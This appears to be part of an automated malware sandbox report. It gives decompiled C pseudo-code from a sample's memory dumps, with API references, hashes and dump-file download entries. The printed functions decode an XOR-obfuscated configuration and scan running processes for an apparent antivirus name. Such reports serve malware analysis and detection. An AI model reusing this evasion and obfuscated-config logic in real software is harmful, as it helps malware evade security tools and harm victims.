                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                            					return _v16;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                            0x0487a1a2
                                                                                                                                                                                                                                                            0x0487a1af
                                                                                                                                                                                                                                                            0x0487a1b0
                                                                                                                                                                                                                                                            0x0487a1b1
                                                                                                                                                                                                                                                            0x0487a1b8
                                                                                                                                                                                                                                                            0x0487a1e6
                                                                                                                                                                                                                                                            0x0487a1e7
                                                                                                                                                                                                                                                            0x0487a1ea
                                                                                                                                                                                                                                                            0x0487a1f0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487a1cf
                                                                                                                                                                                                                                                            0x0487a1d9
                                                                                                                                                                                                                                                            0x0487a1e0
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487a1d1
                                                                                                                                                                                                                                                            0x0487a1d4
                                                                                                                                                                                                                                                            0x0487a1f4
                                                                                                                                                                                                                                                            0x0487a1d6
                                                                                                                                                                                                                                                            0x0487a1d6
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487a1d6
                                                                                                                                                                                                                                                            0x0487a1d4
                                                                                                                                                                                                                                                            0x0487a1fb
                                                                                                                                                                                                                                                            0x0487a201
                                                                                                                                                                                                                                                            0x0487a201
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 0487A1EA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: aecebf8b757d28479b6b341bb4e0a55a45f896e82a008b3bbd0ec4ad5f3d4b74
                                                                                                                                                                                                                                                            • Instruction ID: 0d9b7fc1b02ae831543fdb88dbca9ac88777e54b5176c60367ba03ef539b6ad3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aecebf8b757d28479b6b341bb4e0a55a45f896e82a008b3bbd0ec4ad5f3d4b74
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68F03C71D05218EFDB04DB94D498AEDB7B8FF04348F1085AAE502A3140E374AB80DB61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04871B68(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                                                            				int _t13;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t7 = E04878186(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                                            				_t13 = _t7;
                                                                                                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                                                                                                            					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                                                                            					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                                                                            					E048770FF(_a4);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t13;
                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                            0x04871b74
                                                                                                                                                                                                                                                            0x04871b79
                                                                                                                                                                                                                                                            0x04871b7d
                                                                                                                                                                                                                                                            0x04871b84
                                                                                                                                                                                                                                                            0x04871b8f
                                                                                                                                                                                                                                                            0x04871b93
                                                                                                                                                                                                                                                            0x04871b93
                                                                                                                                                                                                                                                            0x04871b9c

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 04878186: memcpy.NTDLL(00000000,00000090,00000002,00000002,048787B7,00000008,048787B7,048787B7,?,0487867C,048787B7), ref: 048781BC
                                                                                                                                                                                                                                                              • Part of subcall function 04878186: memset.NTDLL ref: 04878231
                                                                                                                                                                                                                                                              • Part of subcall function 04878186: memset.NTDLL ref: 04878245
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000002,048787B7,00000000,00000002,048787B7,048787B7,048787B7,?,0487867C,048787B7,?,048787B7,00000002,?,?,048791D2), ref: 04871B84
                                                                                                                                                                                                                                                              • Part of subcall function 048770FF: HeapFree.KERNEL32(00000000,00000000,04871545,00000000,?,?,00000000), ref: 0487710B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3053036209-0
                                                                                                                                                                                                                                                            • Opcode ID: 6df22bc4fd95822f180ac903808f573e9c23f3e490361b8e084c500166f732a6
                                                                                                                                                                                                                                                            • Instruction ID: 007b97a1ec5b0a5a97f1ec02ef06e7059831ef4df4a2cc43291bdfe5188c3070
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6df22bc4fd95822f180ac903808f573e9c23f3e490361b8e084c500166f732a6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08E08C72401228BBDB123A98DC10DEB7F6DCF51AA1F044620FE0CDA200E662FA5093E2
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                            			E048723FC(int* __ecx) {
                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                            				char* _t32;
                                                                                                                                                                                                                                                            				char* _t33;
                                                                                                                                                                                                                                                            				char* _t34;
                                                                                                                                                                                                                                                            				char* _t35;
                                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t86 = __ecx;
                                                                                                                                                                                                                                                            				_t20 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            				if(E04879ABC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                                                                            					 *0x487d2d0 = _v12;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t25 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            				if(E04879ABC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                                                                                                                                                                                                                            					_push(2);
                                                                                                                                                                                                                                                            					_pop(0);
                                                                                                                                                                                                                                                            					goto L60;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t85 = _v12;
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t31 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t80 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t31 = E048749AA(_t86, _t85, _t80 ^ 0x724e87bc);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                                                                                            						_t86 =  &_v8;
                                                                                                                                                                                                                                                            						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d240 = _v8;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t32 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t76 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t32 = E048749AA(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                                            						_t86 =  &_v8;
                                                                                                                                                                                                                                                            						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d244 = _v8;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t72 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t33 = E048749AA(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t33 != 0) {
                                                                                                                                                                                                                                                            						_t86 =  &_v8;
                                                                                                                                                                                                                                                            						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d248 = _v8;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t34 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t68 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t34 = E048749AA(_t86, _t85, _t68 ^ 0x0602e249);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t34 != 0) {
                                                                                                                                                                                                                                                            						_t86 =  &_v8;
                                                                                                                                                                                                                                                            						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d004 = _v8;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t35 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t64 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t35 = E048749AA(_t86, _t85, _t64 ^ 0x3603764c);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t35 != 0) {
                                                                                                                                                                                                                                                            						_t86 =  &_v8;
                                                                                                                                                                                                                                                            						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							 *0x487d02c = _v8;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t36 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t60 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t36 = E048749AA(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t36 != 0) {
                                                                                                                                                                                                                                                            						_push(_t36);
                                                                                                                                                                                                                                                            						_t57 = 0x10;
                                                                                                                                                                                                                                                            						_t58 = E0487728D(_t57);
                                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                                            							_push(_t58);
                                                                                                                                                                                                                                                            							E0487825F();
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t55 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t37 = E048749AA(_t86, _t85, _t55 ^ 0xb30fc035);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t37 != 0 && E0487728D(0, _t37) != 0) {
                                                                                                                                                                                                                                                            						_t102 =  *0x487d324; // 0x52595b0
                                                                                                                                                                                                                                                            						E048729B7(_t102 + 4, _t53);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t85 == 0) {
                                                                                                                                                                                                                                                            						_t38 = 0;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t50 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            						_t38 = E048749AA(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t38 == 0) {
                                                                                                                                                                                                                                                            						L51:
                                                                                                                                                                                                                                                            						_t39 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t18 = _t39 + 0x487e252; // 0x616d692f
                                                                                                                                                                                                                                                            						 *0x487d2cc = _t18;
                                                                                                                                                                                                                                                            						goto L52;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t49 = E0487728D(0, _t38);
                                                                                                                                                                                                                                                            						 *0x487d2cc = _t49;
                                                                                                                                                                                                                                                            						if(_t49 != 0) {
                                                                                                                                                                                                                                                            							L52:
                                                                                                                                                                                                                                                            							if(_t85 == 0) {
                                                                                                                                                                                                                                                            								_t41 = 0;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t46 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            								_t41 = E048749AA(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							if(_t41 == 0) {
                                                                                                                                                                                                                                                            								_t42 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            								_t19 = _t42 + 0x487e791; // 0x6976612e
                                                                                                                                                                                                                                                            								_t43 = _t19;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t43 = E0487728D(0, _t41);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							 *0x487d340 = _t43;
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _t85);
                                                                                                                                                                                                                                                            							L60:
                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L51;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                            0x048723fc
                                                                                                                                                                                                                                                            0x048723ff
                                                                                                                                                                                                                                                            0x0487241f
                                                                                                                                                                                                                                                            0x0487242d
                                                                                                                                                                                                                                                            0x0487242d
                                                                                                                                                                                                                                                            0x04872432
                                                                                                                                                                                                                                                            0x0487244c
                                                                                                                                                                                                                                                            0x0487264a
                                                                                                                                                                                                                                                            0x0487264c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04872452
                                                                                                                                                                                                                                                            0x04872452
                                                                                                                                                                                                                                                            0x04872459
                                                                                                                                                                                                                                                            0x0487246f
                                                                                                                                                                                                                                                            0x0487245b
                                                                                                                                                                                                                                                            0x0487245b
                                                                                                                                                                                                                                                            0x04872468
                                                                                                                                                                                                                                                            0x04872468
                                                                                                                                                                                                                                                            0x04872479
                                                                                                                                                                                                                                                            0x0487247b
                                                                                                                                                                                                                                                            0x04872485
                                                                                                                                                                                                                                                            0x0487248a
                                                                                                                                                                                                                                                            0x0487248a
                                                                                                                                                                                                                                                            0x04872485
                                                                                                                                                                                                                                                            0x04872491
                                                                                                                                                                                                                                                            0x048724a7
                                                                                                                                                                                                                                                            0x04872493
                                                                                                                                                                                                                                                            0x04872493
                                                                                                                                                                                                                                                            0x048724a0
                                                                                                                                                                                                                                                            0x048724a0
                                                                                                                                                                                                                                                            0x048724ab
                                                                                                                                                                                                                                                            0x048724ad
                                                                                                                                                                                                                                                            0x048724b7
                                                                                                                                                                                                                                                            0x048724bc
                                                                                                                                                                                                                                                            0x048724bc
                                                                                                                                                                                                                                                            0x048724b7
                                                                                                                                                                                                                                                            0x048724c3
                                                                                                                                                                                                                                                            0x048724d9
                                                                                                                                                                                                                                                            0x048724c5
                                                                                                                                                                                                                                                            0x048724c5
                                                                                                                                                                                                                                                            0x048724d2
                                                                                                                                                                                                                                                            0x048724d2
                                                                                                                                                                                                                                                            0x048724dd
                                                                                                                                                                                                                                                            0x048724df
                                                                                                                                                                                                                                                            0x048724e9
                                                                                                                                                                                                                                                            0x048724ee
                                                                                                                                                                                                                                                            0x048724ee
                                                                                                                                                                                                                                                            0x048724e9
                                                                                                                                                                                                                                                            0x048724f5
                                                                                                                                                                                                                                                            0x0487250b
                                                                                                                                                                                                                                                            0x048724f7
                                                                                                                                                                                                                                                            0x048724f7
                                                                                                                                                                                                                                                            0x04872504
                                                                                                                                                                                                                                                            0x04872504
                                                                                                                                                                                                                                                            0x0487250f
                                                                                                                                                                                                                                                            0x04872511
                                                                                                                                                                                                                                                            0x0487251b
                                                                                                                                                                                                                                                            0x04872520
                                                                                                                                                                                                                                                            0x04872520
                                                                                                                                                                                                                                                            0x0487251b
                                                                                                                                                                                                                                                            0x04872527
                                                                                                                                                                                                                                                            0x0487253d
                                                                                                                                                                                                                                                            0x04872529
                                                                                                                                                                                                                                                            0x04872529
                                                                                                                                                                                                                                                            0x04872536
                                                                                                                                                                                                                                                            0x04872536
                                                                                                                                                                                                                                                            0x04872541
                                                                                                                                                                                                                                                            0x04872543
                                                                                                                                                                                                                                                            0x0487254d
                                                                                                                                                                                                                                                            0x04872552
                                                                                                                                                                                                                                                            0x04872552
                                                                                                                                                                                                                                                            0x0487254d
                                                                                                                                                                                                                                                            0x04872559
                                                                                                                                                                                                                                                            0x0487256f
                                                                                                                                                                                                                                                            0x0487255b
                                                                                                                                                                                                                                                            0x0487255b
                                                                                                                                                                                                                                                            0x04872568
                                                                                                                                                                                                                                                            0x04872568
                                                                                                                                                                                                                                                            0x04872573
                                                                                                                                                                                                                                                            0x04872575
                                                                                                                                                                                                                                                            0x04872578
                                                                                                                                                                                                                                                            0x04872579
                                                                                                                                                                                                                                                            0x04872580
                                                                                                                                                                                                                                                            0x04872582
                                                                                                                                                                                                                                                            0x04872583
                                                                                                                                                                                                                                                            0x04872583
                                                                                                                                                                                                                                                            0x04872580
                                                                                                                                                                                                                                                            0x0487258a
                                                                                                                                                                                                                                                            0x048725a0
                                                                                                                                                                                                                                                            0x0487258c
                                                                                                                                                                                                                                                            0x0487258c
                                                                                                                                                                                                                                                            0x04872599
                                                                                                                                                                                                                                                            0x04872599
                                                                                                                                                                                                                                                            0x048725a4
                                                                                                                                                                                                                                                            0x048725b2
                                                                                                                                                                                                                                                            0x048725bc
                                                                                                                                                                                                                                                            0x048725bc
                                                                                                                                                                                                                                                            0x048725c3
                                                                                                                                                                                                                                                            0x048725d9
                                                                                                                                                                                                                                                            0x048725c5
                                                                                                                                                                                                                                                            0x048725c5
                                                                                                                                                                                                                                                            0x048725d2
                                                                                                                                                                                                                                                            0x048725d2
                                                                                                                                                                                                                                                            0x048725dd
                                                                                                                                                                                                                                                            0x048725f0
                                                                                                                                                                                                                                                            0x048725f0
                                                                                                                                                                                                                                                            0x048725f5
                                                                                                                                                                                                                                                            0x048725fb
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048725df
                                                                                                                                                                                                                                                            0x048725e2
                                                                                                                                                                                                                                                            0x048725e9
                                                                                                                                                                                                                                                            0x048725ee
                                                                                                                                                                                                                                                            0x04872600
                                                                                                                                                                                                                                                            0x04872602
                                                                                                                                                                                                                                                            0x04872618
                                                                                                                                                                                                                                                            0x04872604
                                                                                                                                                                                                                                                            0x04872604
                                                                                                                                                                                                                                                            0x04872611
                                                                                                                                                                                                                                                            0x04872611
                                                                                                                                                                                                                                                            0x0487261c
                                                                                                                                                                                                                                                            0x04872628
                                                                                                                                                                                                                                                            0x0487262d
                                                                                                                                                                                                                                                            0x0487262d
                                                                                                                                                                                                                                                            0x0487261e
                                                                                                                                                                                                                                                            0x04872621
                                                                                                                                                                                                                                                            0x04872621
                                                                                                                                                                                                                                                            0x0487263b
                                                                                                                                                                                                                                                            0x04872640
                                                                                                                                                                                                                                                            0x0487264d
                                                                                                                                                                                                                                                            0x04872651
                                                                                                                                                                                                                                                            0x04872651
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048725ee
                                                                                                                                                                                                                                                            0x048725dd

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 04872481
                                                                                                                                                                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 048724B3
                                                                                                                                                                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 048724E5
                                                                                                                                                                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 04872517
                                                                                                                                                                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 04872549
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,04879199,04879199,?,63699BC3,04879199,?,63699BC3,00000005,0487D00C,00000008,?,04879199), ref: 04872640
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                            • Opcode ID: 5ff4028ade0f5f69e22d600d3224171eefd2b01c49051811c5043a8aa529cf77
                                                                                                                                                                                                                                                            • Instruction ID: 635d4a8fba04ea5622b06dc6bbf021ea2d75e92da697b65a6c63e32c0b90ee4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ff4028ade0f5f69e22d600d3224171eefd2b01c49051811c5043a8aa529cf77
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D461C3B0B10104ABEB60EFB89CF8D1B77E9DF487147280FA1A605D7115EAB4FD419721
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                            			E048782EB() {
                                                                                                                                                                                                                                                            				char _v264;
                                                                                                                                                                                                                                                            				void* _v300;
                                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t15 = 0;
                                                                                                                                                                                                                                                            				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                                            				if(_t17 != 0) {
                                                                                                                                                                                                                                                            					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                                            					while(_t8 != 0) {
                                                                                                                                                                                                                                                            						_t9 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            						_t2 = _t9 + 0x487ee48; // 0x73617661
                                                                                                                                                                                                                                                            						_push( &_v264);
                                                                                                                                                                                                                                                            						if( *0x487d0fc() != 0) {
                                                                                                                                                                                                                                                            							_t15 = 1;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                                            						CloseHandle(_t17);
                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				L8:
                                                                                                                                                                                                                                                            				return _t15;
                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                            0x048782f6
                                                                                                                                                                                                                                                            0x04878300
                                                                                                                                                                                                                                                            0x04878304
                                                                                                                                                                                                                                                            0x0487830e
                                                                                                                                                                                                                                                            0x0487833f
                                                                                                                                                                                                                                                            0x04878315
                                                                                                                                                                                                                                                            0x0487831a
                                                                                                                                                                                                                                                            0x04878327
                                                                                                                                                                                                                                                            0x04878330
                                                                                                                                                                                                                                                            0x04878347
                                                                                                                                                                                                                                                            0x04878332
                                                                                                                                                                                                                                                            0x0487833a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487833a
                                                                                                                                                                                                                                                            0x04878348
                                                                                                                                                                                                                                                            0x04878349
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878349
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878343
                                                                                                                                                                                                                                                            0x0487834f
                                                                                                                                                                                                                                                            0x04878354

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048782FB
                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0487830E
                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0487833A
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 04878349
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                            • Opcode ID: 79573e75ee47643bad85ed387679f2aa2d4aa6bd3c98d21d28960da545278587
                                                                                                                                                                                                                                                            • Instruction ID: 2182b4bcbcc1e0a343a07c6493c339a6c24adcfd89c30ae9c139c3c624926373
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79573e75ee47643bad85ed387679f2aa2d4aa6bd3c98d21d28960da545278587
